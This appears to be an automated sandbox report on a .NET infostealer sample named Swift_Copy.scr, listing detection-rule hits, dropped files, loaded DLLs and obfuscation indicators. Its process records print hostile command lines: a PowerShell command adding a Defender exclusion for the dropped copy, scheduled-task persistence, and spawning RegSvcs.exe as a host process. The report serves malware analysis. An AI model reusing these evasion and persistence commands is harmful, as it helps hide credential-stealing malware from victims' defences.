                    Source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Swift_Copy.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: WAuLmtFUmD.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, OTWUo99bfyR.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, OTWUo99bfyR.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, Ui9qhZiA7.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, Ui9qhZiA7.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, BqMB7yHhrXg.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, rWUR7gJwO4M8XQmEUW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winSCR@16/11@1/1
                    Source: C:\Users\user\Desktop\Swift_Copy.scrFile created: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMutant created: \Sessions\1\BaseNamedObjects\rlJOpRb
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1960:120:WilError_03
                    Source: C:\Users\user\Desktop\Swift_Copy.scrFile created: C:\Users\user\AppData\Local\Temp\tmp7FF5.tmpJump to behavior
                    Source: Swift_Copy.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Swift_Copy.scrStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Swift_Copy.scrFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: WAuLmtFUmD.exe.0.drBinary or memory string: select * from Cititor where email like @Nume and parola like @Parola;
                    Source: Swift_Copy.scrVirustotal: Detection: 45%
                    Source: Swift_Copy.scrReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\Swift_Copy.scrFile read: C:\Users\user\Desktop\Swift_Copy.scr:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Swift_Copy.scr "C:\Users\user\Desktop\Swift_Copy.scr" /S
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Swift_Copy.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Swift_Copy.scrStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Swift_Copy.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Swift_Copy.scr, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.cs.Net Code: E9vdbEksc9 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Swift_Copy.scr.5f50000.11.raw.unpack, HomeView.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0584193B pushfd ; retf 8_2_05841941
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0788F88C push es; retf 8_2_0788F88F
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0EFF0CA9 push cs; retf 8_2_0EFF0CB8
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeCode function: 8_2_0EFF3109 push esp; retf 8_2_0EFF3115
                    Source: Swift_Copy.scrStatic PE information: section name: .text entropy: 7.876501523545841
                    Source: WAuLmtFUmD.exe.0.drStatic PE information: section name: .text entropy: 7.876501523545841
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, henXBbc3yZCYFXacjK.csHigh entropy of concatenated method names: 'YlkWGtfh5G', 'dfKWrGZXWK', 'gdCPVwXoG7', 'jdiP7clQjO', 'HI0PoYaQDs', 'OmOPERVnT2', 'NVkPBwByRp', 'GCdPN9Os3l', 'FrrPmqEkVg', 'iQgPyALoyk'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, nZ6fwD6Co1KFKaRig4.csHigh entropy of concatenated method names: 'rdrLTA1550', 'jKcLHA57oh', 'ggoLwK5CDI', 'G7rLPkv9gY', 'bgyLWfkLlA', 'h0kLMDuZ7h', 'ysdLCyPXP6', 'jGSL6KJuvW', 'syFLjrxL8y', 'cEBLZ9uGAS'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, QDgAGFdtSRBSfPJCn1.csHigh entropy of concatenated method names: 'kcDtCWUR7g', 'gO4t6M8XQm', 'YSNtZpJg3I', 'RgbtUJWenX', 'tactljKSWV', 'YM9tIkQjm1', 'hu4lQCpMYAFeWjmvvh', 'GgkEA3SuvkxFSvH6dW', 'Dpqttbr1wj', 'UcvtL6NFpx'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, TdsFnktLAE0UIQL9Kll.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GohnAgcyGk', 'zUYn9B4Gl6', 'll3ngCIjIX', 'gdXnQ9noIi', 'HrbnpyerDA', 'b6yn3UbXe9', 'byHnsXGvJs'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, VY2TOGBjwktYJOiewv.csHigh entropy of concatenated method names: 'EYXCHViqRH', 'n3oCPkVPYN', 'PohCMqWjwg', 'FG8Mq6DuGU', 'sOGMz090pE', 'HsBCv9djLX', 'afQCtRZovr', 'nASChQR5K3', 'A0ZCLrc8WH', 'bpbCdt2hic'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, S4xwiZ3nscacetp2TQ.csHigh entropy of concatenated method names: 'veQY2D155r', 'rVSYq1IyrV', 'EUU0vsJbEp', 'MEx0tf9x9y', 'z7GYxvKo61', 'DIXYafbdrx', 'TOdY8Sg18O', 'J5RYADJwjZ', 'rsQY9S57wR', 'BOWYgHA1AF'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, U8qtcs8WquS83p5A01.csHigh entropy of concatenated method names: 'kx4RJLdlJB', 'TI6RSnl4mv', 'iGgRuEhQP3', 'TTyRK59h2f', 'NQkR7GorQv', 'uaCRo9YP0j', 'OuqRBOXeX5', 'hKoRN6ThFW', 'L7NRywLmvJ', 'VLIRxP4XOc'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, EWVqM9ukQjm1kV60nE.csHigh entropy of concatenated method names: 'ulEMTCyJ0l', 'cbyMwXiuKW', 'OOIMWbCdYI', 'K32MCn2blC', 'qVdM6l1NUT', 'DRfWp6oXDF', 'YVhW3fgmA9', 'SdoWsgDapb', 'HpEW2WLo2d', 'swrW5m4Fn4'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, K5DXy25lGX8JHc3F1Z.csHigh entropy of concatenated method names: 'Q1i0uU4ELZ', 'W8X0K65x5u', 'ubr0VEmds7', 'tqH07iGYVA', 'y850A2Kb71', 'Pim0ondeTL', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Swift_Copy.scr.5011610.7.raw.unpack, x6J6dmtvU2KqcCPQUcW.csHigh entropy of concatenated method names: 's3gDOsdmU0', 'Mf1DfhO9jL', 'OfrDbHdJew', 'mGjD1AD9ta', 'JMIDGnHGH1', 'pLwD4b9xid', 'KMCDr6iZB6', 'cPHDJHis7f', 'MWUDSSSJcg', 'yt5DcR93q5'
